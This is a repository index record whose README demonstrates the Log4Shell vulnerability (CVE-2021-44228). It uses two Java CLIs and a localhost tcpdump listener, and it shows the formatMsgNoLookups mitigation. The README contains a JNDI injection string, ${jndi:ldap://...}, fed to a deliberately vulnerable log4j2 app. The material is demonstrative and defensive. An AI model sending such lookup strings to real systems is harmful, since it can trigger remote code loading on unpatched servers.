{"id":15447448,"url":"https://github.com/datadavev/test-44228","last_synced_at":"2025-08-15T19:28:49.079Z","repository":{"id":45157271,"uuid":"437319619","full_name":"datadavev/test-44228","owner":"datadavev","description":"Simple demo of CVE-2021-44228","archived":false,"fork":false,"pushed_at":"2022-01-04T16:56:11.000Z","size":10,"stargazers_count":0,"open_issues_count":2,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-02T09:27:13.596Z","etag":null,"topics":["cve-2021-44228"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/datadavev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-11T15:33:17.000Z","updated_at":"2021-12-11T15:42:35.000Z","dependencies_parsed_at":"2022-09-22T18:02:38.799Z","dependency_job_id":null,"html_url":"https://github.com/datadavev/test-44228","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/datadavev%2Ftest-44228","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/datadavev%2Ftest-44228/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/datadavev%2Ftest-44228/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/datadavev%2Ftest-44228/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/datadavev","download_url":"https://codeload.github.com/datadavev/test-44228/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245999318,"owners_count":20707554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-44228"],"created_at":"2024-10-01T20:05:55.418Z","updated_at":"2025-03-28T08:44:13.612Z","avatar_url":"https://github.com/datadavev.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# test-44228\n\nA simple example for [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)\n\nImplements two java CLIs, one using log4j v1.x, the other using log4j 2.x to demonstrate the log4shell vulnerability.\n\nSee also:\n\n- https://www.lunasec.io/docs/blog/log4j-zero-day/\n- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html\n\n## Usage\n\n### Vulnerable Log4J2\n\n1. Start a listener on some server (localhost or remote), e.g.:\n\n```\n$ sudo tcpdump -i any tcp port 1234\ntcpdump: data link type PKTAP\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on any, link-type PKTAP (Apple DLT_PKTAP), capture size 262144 bytes\n```\n\n2. Run the vulnerable app:\n\n```\nmvn compile exec:java \\\n  -Dexec.mainClass=\"com.beehivebeach.AppL4J2\" \\\n  -Dexec.args=\"'\\${jndi:ldap://127.0.0.1:1234/test}'\"\n```\n\nThe listener will report a connection:\n\n```\n10:19:37.600368 IP localhost.56945 \u003e localhost.search-agent: Flags [S], seq 1972103573, win 65535, options [mss 16344,nop,wscale 6,nop,nop,TS val 3783661067 ecr 0,sackOK,eol], length 0\n10:19:37.600380 IP localhost.56945 \u003e localhost.search-agent: Flags [S], seq 1972103573, win 65535, options [mss 16344,nop,wscale 6,nop,nop,TS val 3783661067 ecr 0,sackOK,eol], length 0\n10:19:37.600386 IP localhost.search-agent \u003e localhost.56945: Flags [R.], seq 0, ack 1972103574, win 0, length 0\n10:19:37.600388 IP localhost.search-agent \u003e localhost.56945: Flags [R.], seq 0, ack 1, win 0, length 0\n```\n\nand the java app will report an exception:\n\n```\n$ mvn compile exec:java \\\n  -Dexec.mainClass=\"com.beehivebeach.AppL4J2\" \\\n  -Dexec.args=\"'\\${jndi:ldap://127.0.0.1:1234/test}'\"\n[INFO] Scanning for projects...\n[INFO]\n[INFO] --------------------\u003c com.beehivebeach:test-44228 \u003e---------------------\n[INFO] Building test-44228 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ test-44228 ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] Copying 1 resource\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ test-44228 ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO]\n[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ test-44228 ---\nArguments (1) :\n2021-12-11 10:19:37,602 com.beehivebeach.AppL4J2.main() WARN Error looking up JNDI resource [ldap://127.0.0.1:1234/test]. javax.naming.CommunicationException: 127.0.0.1:1234 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]\n\tat com.sun.jndi.ldap.Connection.\u003cinit\u003e(Connection.java:243)\n\tat com.sun.jndi.ldap.LdapClient.\u003cinit\u003e(LdapClient.java:137)\n\tat com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)\n\tat com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2849)\n\tat com.sun.jndi.ldap.LdapCtx.\u003cinit\u003e(LdapCtx.java:347)\n\tat com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)\n\tat com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)\n\tat com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)\n\tat com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)\n\tat javax.naming.InitialContext.lookup(InitialContext.java:417)\n\tat org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)\n\tat org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)\n\tat org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:223)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)\n\tat org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)\n\tat org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)\n\tat org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:345)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)\n\tat org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)\n\tat org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)\n\tat org.apache.logging.log4j.core.Logger.log(Logger.java:161)\n\tat org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2198)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2152)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2135)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2011)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)\n\tat org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1320)\n\tat com.beehivebeach.AppL4J2.main(AppL4J2.java:35)\n\tat org.codehaus.mojo.exec.ExecJavaMojo$1.run(ExecJavaMojo.java:254)\n\tat java.lang.Thread.run(Thread.java:748)\nCaused by: java.net.ConnectException: Connection refused (Connection refused)\n\tat java.net.PlainSocketImpl.socketConnect(Native Method)\n\tat java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:350)\n\tat java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:206)\n\tat java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:188)\n\tat java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)\n\tat java.net.Socket.connect(Socket.java:607)\n\tat java.net.Socket.connect(Socket.java:556)\n\tat java.net.Socket.\u003cinit\u003e(Socket.java:452)\n\tat java.net.Socket.\u003cinit\u003e(Socket.java:229)\n\tat com.sun.jndi.ldap.Connection.createSocket(Connection.java:380)\n\tat com.sun.jndi.ldap.Connection.\u003cinit\u003e(Connection.java:220)\n\t... 44 more\n\n10:19:37.588 [com.beehivebeach.AppL4J2.main()] INFO  com.beehivebeach.AppL4J2 - 0: ${jndi:ldap://127.0.0.1:1234/test}\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time:  1.002 s\n[INFO] Finished at: 2021-12-11T10:19:37-05:00\n[INFO] ------------------------------------------------------------------------\n```\n\n3. Run with `-Dlog4j2.formatMsgNoLookups=true` to demonstrate no exteneral connection. The listener will not report a connection and the connection failed exception is not reported:\n\n```\n$ mvn compile exec:java \\\n  -Dexec.mainClass=\"com.beehivebeach.AppL4J2\" \\\n  -Dexec.args=\"'\\${jndi:ldap://127.0.0.1:1234/test}'\" \\\n  -Dlog4j2.formatMsgNoLookups=true\n\n[INFO] Scanning for projects...\n[INFO]\n[INFO] --------------------\u003c com.beehivebeach:test-44228 \u003e---------------------\n[INFO] Building test-44228 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ test-44228 ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] Copying 1 resource\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ test-44228 ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO]\n[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ test-44228 ---\nArguments (1) :\n10:23:16.555 [com.beehivebeach.AppL4J2.main()] INFO  com.beehivebeach.AppL4J2 - 0: ${jndi:ldap://127.0.0.1:1234/test}\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time:  1.000 s\n[INFO] Finished at: 2021-12-11T10:23:16-05:00\n[INFO] ------------------------------------------------------------------------  \n```\n\n### Not vulnerable, Log4J v1.x\n\n1. Start a listener as before\n\n2. Run the log4j v1 app:\n\n```\n$ mvn compile exec:java \\\n  -Dexec.mainClass=\"com.beehivebeach.AppL4J1\" \\\n  -Dexec.args=\"'\\${jndi:ldap://127.0.0.1:1234/test}'\"\n[INFO] Scanning for projects...\n[INFO]\n[INFO] --------------------\u003c com.beehivebeach:test-44228 \u003e---------------------\n[INFO] Building test-44228 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ test-44228 ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] Copying 1 resource\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ test-44228 ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO]\n[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ test-44228 ---\nArguments App 1 (1) :\n0 [com.beehivebeach.AppL4J1.main()] INFO com.beehivebeach.AppL4J1  - 0: ${jndi:ldap://127.0.0.1:1234/test}\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time:  0.682 s\n[INFO] Finished at: 2021-12-11T10:26:04-05:00\n[INFO] ------------------------------------------------------------------------\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdatadavev%2Ftest-44228","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdatadavev%2Ftest-44228","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdatadavev%2Ftest-44228/lists"}